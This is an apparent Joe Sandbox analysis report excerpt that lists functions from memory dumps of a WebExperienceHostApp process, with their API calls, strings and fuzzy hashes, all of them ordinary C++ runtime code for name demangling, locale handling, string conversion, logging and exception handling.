Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98c1b88eb9c640e9ce4bb8c213d6810a72f27032ed787440f2bc18eff2a669a
Instruction ID: dee9cbdabbe2cb0e5753cbe5a5c0fa0f741a7d9ad2f5dca3e82904b08c5a1a3a
Opcode Fuzzy Hash: a98c1b88eb9c640e9ce4bb8c213d6810a72f27032ed787440f2bc18eff2a669a
Instruction Fuzzy Hash: 426103B2B16B0682EF10CF5AA864A697355FB98BC4F058536DE1D43BACEE3CD640C300

Function 00007FFE13208918 Relevance: 54.6, APIs: 3, Strings: 28, Instructions: 354COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE13208E23
DName::operator+.LIBVCRUNTIME ref: 00007FFE13208E5B
DName::operator+.LIBVCRUNTIME ref: 00007FFE13208E95

Strings

__int16, xrefs: 00007FFE13208B12
unsigned , xrefs: 00007FFE13208DE0
bool, xrefs: 00007FFE13208D42
decltype(auto), xrefs: 00007FFE13208DAC
double, xrefs: 00007FFE13208A41
void, xrefs: 00007FFE13208A7F
__int64, xrefs: 00007FFE13208BBB
<unknown>, xrefs: 00007FFE13208C0A
long, xrefs: 00007FFE132089B5
char, xrefs: 00007FFE132089EB
UNKNOWN, xrefs: 00007FFE13208D76
char16_t, xrefs: 00007FFE13208D51
wchar_t, xrefs: 00007FFE13208D8E
long , xrefs: 00007FFE13208A2A
__w64 , xrefs: 00007FFE13208B30
volatile, xrefs: 00007FFE13208CE4
const, xrefs: 00007FFE13208CC9
signed , xrefs: 00007FFE13208DF0
auto, xrefs: 00007FFE13208C2B
char8_t, xrefs: 00007FFE13208C19
volatile, xrefs: 00007FFE13208D11
__int128, xrefs: 00007FFE13208BAC
short, xrefs: 00007FFE132089D9
__int32, xrefs: 00007FFE13208BCA
float, xrefs: 00007FFE13208A6D
__int8, xrefs: 00007FFE13208B24
int, xrefs: 00007FFE132089C7
char32_t, xrefs: 00007FFE13208D9D

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
API String ID: 2943138195-1388207849
Opcode ID: 37cd17523382c81690176946402e2147554894c591ccd7ecb33aaa85e6f6bad3
Instruction ID: b6170545894feb949053dff9da2085afe0c5a5b561d18de7674d9c500fef1f1d
Opcode Fuzzy Hash: 37cd17523382c81690176946402e2147554894c591ccd7ecb33aaa85e6f6bad3
Instruction Fuzzy Hash: B1F18572E18E128CFB14AB66D5542BD2BB0BBB5364F4041B5DA1D36AB9DFBCE508C340

Function 00007FF625A13AE0 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 170windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF625A13C0B
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF625A13C8C

Strings

%hs(%d) tid(%x) %08X %ws, xrefs: 00007FF625A13CAE
LogHr, xrefs: 00007FF625A13B7E
FailFast, xrefs: 00007FF625A13B71
%hs(%u)\%hs!%p: , xrefs: 00007FF625A13C40
%hs!%p: , xrefs: 00007FF625A13C59
, xrefs: 00007FF625A13CD6
(caller: %p) , xrefs: 00007FF625A13C77
LogNt, xrefs: 00007FF625A13B85
CallContext:[%hs] , xrefs: 00007FF625A13D0C
[%hs(%hs)], xrefs: 00007FF625A13D33
ReturnHr, xrefs: 00007FF625A13B96
ReturnNt, xrefs: 00007FF625A13B9D
[%hs], xrefs: 00007FF625A13D4C
Msg:[%ws] , xrefs: 00007FF625A13CF1
Exception, xrefs: 00007FF625A13BAA

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$LogNt$Msg:[%ws] $ReturnHr$ReturnNt$[%hs(%hs)]$[%hs]
API String ID: 2411632146-1363043106
Opcode ID: 5c63f51611423cf63e7b47493f3111f8813da6670d8a67703035579ad02dc22e
Instruction ID: 08a63e316b3def36528aac0cdb7e425c61e4a4e2637f147af60d2f45f9a7e95b
Opcode Fuzzy Hash: 5c63f51611423cf63e7b47493f3111f8813da6670d8a67703035579ad02dc22e
Instruction Fuzzy Hash: AE716861A19A4281EE75CF55AD026B9A7A0FF48F84F44C036EE4E87798DF3CED448352

Function 00007FFE1320C0EC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C17D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C1B6
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C28A
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C29B
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C303
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C313
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C35F
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C371
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C4E3

Part of subcall function 00007FFE1320E098: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1320E0F2

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C565
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C574

Strings

`anonymous namespace', xrefs: 00007FFE1320C443

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID: `anonymous namespace'
API String ID: 3863519203-3062148218
Opcode ID: 180c6269b417ee698a575686cc6b4d1958a01edd13727ba1ef1c9a4d3a0f115e
Instruction ID: ddce1c8afb1ec83735fa49538fa9cea45b04537bbae5ee20d33450fd46461a88
Opcode Fuzzy Hash: 180c6269b417ee698a575686cc6b4d1958a01edd13727ba1ef1c9a4d3a0f115e
Instruction Fuzzy Hash: 46E18FB2908F8289EB20EF66D4801AD77B0FBA47A4F904175EA4D2BB75DF38D558C700

Function 00007FFE1320CF40 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320D2F6
atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFE13208568), ref: 00007FFE1320D3A7
DName::DName.LIBVCRUNTIME ref: 00007FFE1320D3E6
swprintf_s.PGOCR ref: 00007FFE1320D406
DName::DName.LIBVCRUNTIME ref: 00007FFE1320D416
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320D466

Strings

`generic-class-parameter-, xrefs: 00007FFE1320D477
lambda, xrefs: 00007FFE1320D308
NULL, xrefs: 00007FFE1320D00A
nullptr, xrefs: 00007FFE1320D12D
`template-type-parameter-, xrefs: 00007FFE1320D487
`generic-method-parameter-, xrefs: 00007FFE1320D433

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::Name::operator+$atolswprintf_s
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
API String ID: 1620834350-2441609178
Opcode ID: a29e71e536bdf6e447e3ff857d12b2a59669ef8e6c250949fd0826cea6345cbe
Instruction ID: 7dbe7618a852690629b72b9edd4af9ca62d304aca445201b350a220c39d434d6
Opcode Fuzzy Hash: a29e71e536bdf6e447e3ff857d12b2a59669ef8e6c250949fd0826cea6345cbe
Instruction Fuzzy Hash: D4F19062E09E528DFB24BB76C5941BC27A1AFE5764F5401B6CA0D36AB6DE3CE54CC300

Function 00007FFE1320A558 Relevance: 22.9, APIs: 15, Instructions: 355COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320A5A9
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320A672
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320A6BB
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320A6CC

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 79b7bf95ee04f70869f45912711fcc0273f108ef1dfd3bc8f68c2be49afff2d4
Instruction ID: f3b6a8bd46d1c1f6b9a45dce639cfa7b82df427412b75fca361a2031fe0c73a4
Opcode Fuzzy Hash: 79b7bf95ee04f70869f45912711fcc0273f108ef1dfd3bc8f68c2be49afff2d4
Instruction Fuzzy Hash: 31F17C72F08A829EF710EF66D4901EC37B1EBA475CB844175EA4D67AA9DF38D509C340

Function 00007FFDFBA42740 Relevance: 18.2, APIs: 12, Instructions: 240COMMON

Download Yara Rule

APIs

__strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA42786
__strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA427AB
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA427EB
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA4288E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA428F5
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA42930
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA42952
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA4297B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA429DB
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA42A13
CompareStringEx.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA42A46
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA42A73

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ByteCharMultiWide$__strncntfreemalloc$CompareInfoString
String ID:
API String ID: 3420081407-0
Opcode ID: 8b6a2b54a2774314e61cfe64b8eab3a827394a4d764bd27520b14f448ccade5b
Instruction ID: 1dbaef2a627d3e505f628472da4533c7571a7b0945850623c98a2bac4914f3fd
Opcode Fuzzy Hash: 8b6a2b54a2774314e61cfe64b8eab3a827394a4d764bd27520b14f448ccade5b
Instruction Fuzzy Hash: 65A1B322B2A78786EB309B258460B7D7691AF44BA8F444631DA7D067FDDFBDE6448300

Function 00007FFE13202CF4 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE13202D51

Part of subcall function 00007FFE13205050: __GetUnwindTryBlock.LIBCMT ref: 00007FFE13205093
Part of subcall function 00007FFE13205050: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE132050B8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE13202E29
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13202E36
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE13203080
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132030AE

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13203174
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE132031A9

Strings

csm, xrefs: 00007FFE13202E4E
csm, xrefs: 00007FFE13202D6B
csm, xrefs: 00007FFE13202DD2

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 4223619315-393685449
Opcode ID: edc5f55d8364ed346ae9e81db86cccb1f66bda3bd14ed8078bac2ea6355eac48
Instruction ID: b2064ed1e8272fb667644001157157e529f4ed3c449aee3553deb253486b138b
Opcode Fuzzy Hash: edc5f55d8364ed346ae9e81db86cccb1f66bda3bd14ed8078bac2ea6355eac48
Instruction Fuzzy Hash: FFE17672908F418AEB20EF66D4402AD77A4FBA9BA8F140175DF8D67765CF38E499C700

Function 00007FFE1320E098 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1320E0F2

Strings

`generic-type-, xrefs: 00007FFE1320E1D9
generic-type-, xrefs: 00007FFE1320E1A6
template-parameter-, xrefs: 00007FFE1320E15F
`template-parameter-, xrefs: 00007FFE1320E192

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Replicator::operator[]
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 3676697650-3207858774
Opcode ID: 068e360b79be31260e9f0f338d3f50443f14e550a52f9abb55243442d8c120c9
Instruction ID: ab4580769c4b1e84304701030fbd87ef0e2e5c08e78cd397b826276e279dc298
Opcode Fuzzy Hash: 068e360b79be31260e9f0f338d3f50443f14e550a52f9abb55243442d8c120c9
Instruction Fuzzy Hash: 0E916032A08E468DFB20AF26D4502BC77A1ABE4B64F8441B5DA4D637B5DF3CE549C740

Function 00007FFDFBA57038 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

_Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B06E), ref: 00007FFDFBA57083
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B06E), ref: 00007FFDFBA570A3
_Maklocstr.LIBCPMT ref: 00007FFDFBA570BD
_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B06E), ref: 00007FFDFBA570C6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDFBA5B06E), ref: 00007FFDFBA570E6
_Maklocstr.LIBCPMT ref: 00007FFDFBA57100
_Maklocstr.LIBCPMT ref: 00007FFDFBA57115

Part of subcall function 00007FFDFBA44D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D32
Part of subcall function 00007FFDFBA44D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D58
Part of subcall function 00007FFDFBA44D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D70

Strings

:AM:am:PM:pm, xrefs: 00007FFDFBA5710E
:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFDFBA570AD
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFDFBA570F0

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 2460671452-35662545
Opcode ID: 68a3b1b276eb7da605c86357e63600b8dc1e5b54f3908e2d283bd71975fe3a53
Instruction ID: 633e52f398d3b6348a84f4f7720e931c63ec5d9cd8fe451a54954e220a84e710
Opcode Fuzzy Hash: 68a3b1b276eb7da605c86357e63600b8dc1e5b54f3908e2d283bd71975fe3a53
Instruction Fuzzy Hash: 7B316D22B06B4686EB00DF21E8606A973A5FB88FC4F498131DA5D537AADF7CE181C340

Function 00007FFDFBA42B70 Relevance: 16.7, APIs: 11, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA42BB7
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA42BE3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA42C53
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA42C8C
LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA42CC3
LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA42D1C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA42D82
LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA42DCA
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FFDFBA42E0C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA42E20
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA42E3D

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ByteCharMultiStringWide$freemalloc$__strncnt
String ID:
API String ID: 1733283546-0
Opcode ID: 7481873b54e877f7fc9af2c00e2f3984987d914e500c084b73b5f1e45f384833
Instruction ID: 1d655f9dd7c29ceb6d07bc257e4274a182f487eca3e1f9f4583e3277186807aa
Opcode Fuzzy Hash: 7481873b54e877f7fc9af2c00e2f3984987d914e500c084b73b5f1e45f384833
Instruction Fuzzy Hash: 0B81923271A74286EB209F11E460B6A77A1FB44BA8F140235EA6D07BFCDFBDD5458300

Function 00007FFDFBA79DE0 Relevance: 16.7, APIs: 11, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7A764: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A78A
Part of subcall function 00007FFDFBA7A764: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A7F4

_Stoflt.LIBCPMT ref: 00007FFDFBA79E64
_FXp_setw.LIBCPMT ref: 00007FFDFBA79E7E
_FXp_setw.LIBCPMT ref: 00007FFDFBA79E91
_FXp_setn.LIBCPMT ref: 00007FFDFBA79ED5
_FXp_addx.LIBCPMT ref: 00007FFDFBA79EE7
_FXp_setw.LIBCPMT ref: 00007FFDFBA79F3E
_FXp_setw.LIBCPMT ref: 00007FFDFBA79F51
_FXp_setn.LIBCPMT ref: 00007FFDFBA79E9C

Part of subcall function 00007FFDFBA71384: _FXp_setw.LIBCPMT ref: 00007FFDFBA713BD

_FXp_setn.LIBCPMT ref: 00007FFDFBA79F5C
_FXp_setn.LIBCPMT ref: 00007FFDFBA79F95
_FXp_addx.LIBCPMT ref: 00007FFDFBA79FA7

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setw$Xp_setn$Xp_addx$Stofltisspaceisxdigit
String ID:
API String ID: 3166507417-0
Opcode ID: a2a4b0507d6de304d91fa30e7ec2a10c1d98e7d84d314cc1b7b0df0453b4069f
Instruction ID: fb769d7209c811c673f88549efffdded74135157c715332ed9d9ea10169f34a4
Opcode Fuzzy Hash: a2a4b0507d6de304d91fa30e7ec2a10c1d98e7d84d314cc1b7b0df0453b4069f
Instruction Fuzzy Hash: 78618422F0E5435AEB11DBA1E4A09FD3761EB5474CF604136DE1D63AEDDE78A50E8340

Function 00007FFDFBA8A100 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA8A30E
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA8A31F
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA8A362
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA8A373
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA8A3ED
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA8A3FE

Strings

ios_base::failbit set, xrefs: 00007FFDFBA8A2E2, 00007FFDFBA8A336, 00007FFDFBA8A3C1
ios_base::eofbit set, xrefs: 00007FFDFBA8A2E9, 00007FFDFBA8A33D, 00007FFDFBA8A3C8
ios_base::badbit set, xrefs: 00007FFDFBA8A2D6, 00007FFDFBA8A32A, 00007FFDFBA8A380, 00007FFDFBA8A3B4, 00007FFDFBA8A410

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
